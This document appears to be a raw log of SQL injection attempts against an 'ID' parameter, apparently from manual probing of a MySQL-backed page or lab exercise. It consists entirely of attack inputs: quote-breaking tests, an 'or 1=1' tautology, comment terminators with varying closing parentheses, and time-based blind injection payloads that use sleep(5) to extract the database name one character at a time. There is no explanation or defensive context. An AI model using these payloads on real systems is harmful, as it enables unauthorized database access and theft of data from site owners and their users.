ID:1' and if(ascii(mid((select database()),1,1))=115,1,sleep(5))-- 
ID:1' and if(ascii(mid((select database()),1,1))=115,1,sleep(5))-- 
ID:1'
ID:1' or 1=1
ID:1'-- 
ID:1"
ID:1"
ID:1
ID:1
ID:1'))-- 
ID:1'))-- 
ID:1')-- 
ID:1'))-- 
ID:1' and if(mid(database(),1,1)=115,1,sleep(5)))-- 
ID:1' and if(mid(database(),1,1)=115,1,sleep(5)))-- 
ID:1' and if(ascii(mid(database(),1,1))=115,1,sleep(5)))-- 
ID:1' and if(ascii(mid(database(),1,1))=115,1,sleep(5)))-- 
ID:1' and if(ascii(mid(database(),1,1))=115,1,sleep(5)))-- 
ID:1' and if(ascii(mid(database(),1,1))=115,1,sleep(5))))-- 
ID:1' and if(ascii(mid(database(),1,1))=115,1,sleep(5))))-- 
